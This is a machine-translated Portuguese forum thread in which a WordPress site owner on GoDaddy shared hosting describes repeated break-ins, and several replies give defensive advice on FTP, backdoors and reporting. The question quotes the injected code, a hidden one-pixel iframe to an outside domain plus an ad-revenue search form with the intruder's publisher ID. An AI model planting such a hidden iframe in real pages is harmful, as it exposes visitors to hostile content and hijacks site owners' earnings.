Website invadido novamente

Navegue suas respostas
7

Atualização final:

As coisas foram pacíficas nas últimas semanas e me ensinaram muito mais sobre segurança e riscos de sites. Aqui está a minha versão da história -

Eu estava usando uma versão antiga do wordpress e provavelmente essa pessoa me pegou do google. Eu acho que foi um ataque de script. É difícil dizer como e quando a segurança foi realmente comprometida, chegou ao meu conhecimento em 5 de novembro de 2009. Enquanto eu tomei algumas medidas de segurança na época (descritas abaixo), mas há sempre a possibilidade de eu perder as senhas wordpress rechanging quando Eu formatei meu computador de trabalho.

Agora eu deletei todos os scripts php não solicitados da hospedagem, tornei a parte de administração acessível apenas para o meu IP, bloqueei um determinado intervalo de IP que pertence ao vietnam. Backups diários e outras coisas. O problema é que há tantas variáveis envolvidas e é muito difícil acompanhar tudo e cada uma delas. A principal lição é estar preparado para isso. :)

Estou em um plano de hospedagem compartilhada da GoDaddy e gerencio um site do WordPress. Meu site foi invadido pela primeira vez em 5 de novembro de 2009. Naquela época, o hacker substituiu meus anúncios por seus próprios. Eu pensei que isso aconteceu por causa da minha preguiça com segurança, mas eu estava tão errado.

Formatei meu computador e configurei tudo novamente. Substituiu o ESET NOD32 pelo Microsoft Security Essentials. Atualizada para a versão mais recente do WordPress. Mudou todas as senhas. Configurar um novo banco de dados. E outras coisas relacionadas à segurança eu li aqui e ali. As coisas funcionaram bem por um tempo até que meu site foi hackeado novamente hoje.

A última vez, o cara jogou com muitos arquivos e especificamente alterou footer.php e todos os arquivos relacionados a anúncios. Mas desta vez ele simplesmente foi para o lugar certo e foi substituído pelo seguinte código - 

<IFRAME height=1 src="http://blackberryrss.com/check.html"frameBorder=0width=1></IFRAME><formaction="http://www.google.com/cse" id="cse-search-box">
  <div>
    <input type="hidden" name="cx" value="partner-pub-2815780429722377:hhm6d0-6wfw" />

    <input type="hidden" name="ie" value="ISO-8859-1" />
    <input type="text" name="q" size="31" />
    <input type="submit" name="sa" value="Search" />
  </div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>

Parecequeessapessoanãoestáinteressadaemmanipularbancodedados,etc.,masapenascoloqueocódigoeganhedinheirorapidamente.GodaddyencaminhoumeuslogsdeftpehouveumacessonãoautorizadodoIP-117.2.56.31.EsteIPpertenceaoVietnãetambémo link tem alguma conexão com o Vietnã.

Não há acesso SSH à minha conta e eu me conecto ao FTP usando o FireFTP. Esta foi a resposta da GoDaddy da última vez -

Upon reviewing your account we have found your FTP account has been compromised either due to malware on your local computer or a weak FTP/Hosting password.

Mas eu mudei todas as senhas, contas excluídas, etc., mas nada parece funcionar. Eu estou sem noção no momento. Por favor me diga o que fazer? Como posso evitar acesso não autorizado à minha conta ??????

Detalhes adicionais:

  • A força da senha é apenas strong, mas não melhor.
  • Eu pessoalmente uso o Windows XP SP3, o Firewall do Windows, etc. Após o primeiro ataque, aprendi a trabalhar usando uma conta de usuário e a evitar a conta de administrador.
  • Quando vejo logs de FTP para o primeiro ataque, fica claro que a pessoa está fazendo tudo manualmente.
por Arpit Tambi 23.11.2009 / 19:00

7 respostas

8

Tenha em mente que o FTP envia sua senha em CLEAR TEXT. Portanto, o potencial de compromisso está definitivamente presente.

Outra coisa a considerar, é a sua senha FTP ÚNICA para sua hospedagem? Tem certeza de que não está usando em outro lugar? Nenhuma outra conta, site, etc?

Qual é a segurança da sua senha EMAIL? Estive envolvido em casos em que o "elo fraco" era na verdade a senha EMAIL e o culpado estava apenas enviando "esqueci as senhas" para o e-mail e excluindo as evidências da caixa de e-mail enquanto todos estavam muito ocupados concentrando-se no servidor comprometido aviso.

Apenas algumas coisas que vieram à mente ... algumas outras coisas, é claro, seriam uma abordagem de engenharia social com seu ISP ou alguma vulnerabilidade de software em seu servidor ou um dos pacotes que você hospeda.

Há mais (obviamente), mas esses são tipicamente os "suspeitos usuais".

ATUALIZAÇÃO:

Com base nessas novas informações (que o hacker não está usando o FTP para alterar seus arquivos), só posso presumir que a causa mais provável seja provavelmente um aplicativo da Web desprotegido.

Essa não é a única coisa que pode ser, mas em casos como este é o mais provável.

Outra coisa a considerar (e verificar) é se ele se deixou algum tipo de "porta dos fundos" para o seu aplicativo. Eu me lembro de você mencionar antes que seu ISP disse que ele veio via FTP. É possível que ele tenha entrado via FTP pela primeira vez e tenha deixado uma porta nos fundos?

Além disso, é um tiro no escuro, mas eu pessoalmente testemunhei caixas comprometidas onde um hacker só veio em uma vez, mas deixou um trabalho cron que manteve a mudança de arquivos e outros males diversos. É possível que o hacker não tenha voltado e você esteja lidando com um script automatizado? Apenas algo para verificar se você acha que esgotou todas as outras possibilidades.

Por fim, você tem acesso aos seus registros da web, registros do sistema, etc? Se sim, o que eles dizem? Eles revelam alguma pista?

    
por 23.11.2009 / 19:18
2

Você pode querer ler Detalhe Post-Mortem de um WordPress Hack . Outra postagem que fornece muitas informações sobre um blog do WordPress hackeado com links. O próprio WordPress tem uma FAQ sobre o que fazer depois que seu blog foi invadido.

WordPress é um aplicativo altamente direcionado apenas por causa de sua popularidade. Lutar contra hackers desses sites é um trabalho em tempo integral. De sua descrição, parece que alguém encontrou um exploit do WordPress está usando-o para sua plena vantagem. Você parece estar fazendo tudo certo até agora, mas estou pensando que o invasor está lançando um arquivo em seu site e o ataque nessa direção. O primeiro link que eu indiquei você vai para uma descrição muito detalhada disso e quais os passos que eles tomaram para combatê-lo.

No final, você pode ter que pensar em mudar do WordPress para outro aplicativo de blog. Boa sorte em se defender, e espero que isso ajude alguns.

    
por 23.11.2009 / 20:16
1

O GoDaddy oferece acesso SSH e você pode se conectar à sua conta usando o Putty.exe na porta 22. Quando estiver conectado você pode usar Putty para criar 2 proxy / túneis nas portas 20 e 21. Então você pode usar ftp através do túnel seguro para acessar seus arquivos.

Ou, melhor ainda, você pode fazer a mesma coisa muito mais simples usando o PSFTP. exe ou você pode se conectar à porta 22 com o cliente FileZilla.

    
por 24.11.2009 / 01:50
1

Questão tola, mas - você já tentou alterar a senha e usar outro computador? Talvez haja um registrador de teclas no seu PC.

Eu suspeito de uma brincadeira aqui, ou pelo menos um ataque direcionado. Alguém que você conhece está disposto a fazer uma brincadeira dessas?

Saia da caixa antes de ficar muito paranóico. Isso ajuda.

ps: ou talvez um tema de wordpress mal usado. Ou credenciais erradas no acesso ao banco de dados.

    
por 25.11.2009 / 23:12
1

A menos que você execute todas as sessões de FTP por meio de um túnel seguro (ou melhor ainda, use sftp), essa senha SERÁ detectada.

Nossa prática padrão é não ter FTP em tudo. Se necessário, então permitimos apenas o ftp anônimo e restringir strongmente isso a uma área conhecida.

Se o upload for necessário, não será permitida a listagem do diretório de upload.

    
por 12.07.2010 / 02:19
0

Para ser sincero, peço ao ISP para bloquear esse IP no nível do firewall. Se a GoDaddy não está disposta a fazer isso, então para mim parece que eles são um hoster irresponsável que não toma medidas para proteger seus dados e você deve mudar.

O blackberryrss.com está localizado nos EUA, então você tem alguma vantagem que pode tomar: DNS Stuff

Denuncie o ID do editor aqui, o Google é extremamente sério quando se trata de atividades fraudulentas em sua rede do AdSense. Denunciar abuso do Google Adsense

Na verdade, para ser honesto, o GoDaddy nem deveria deixá-lo entrar, porque o DNS reverso desse IP é "localhost", que é uma grande bandeira vermelha. Apenas 1 endereço IPv4 deve resolver para localhost (supondo, é claro, que estamos falando apenas sobre os endereços IP padrão) e que é 127.0.0.1. DNS

Para cavar ainda mais fundo na toca do coelho, parece que o bluehost está hospedando o servidor, então dê um toque e veja o que eles querem fazer (se houver).

E você sempre tem a opção de denunciar às autoridades locais (é um crime obter acesso a redes e computadores aos quais você não tem direito ou privilégios de acesso)

    
por 24.11.2009 / 15:50
0

Sua senha de FTP está sendo detectada, acontece com nossos sites hospedados lá muito.

    
por 18.12.2009 / 10:07

Tags

Tenho cerca de 20 servidores… como gerencio as chaves SSH e as permissões de cada um? Software de monitoramento de integridade do servidor [fechado]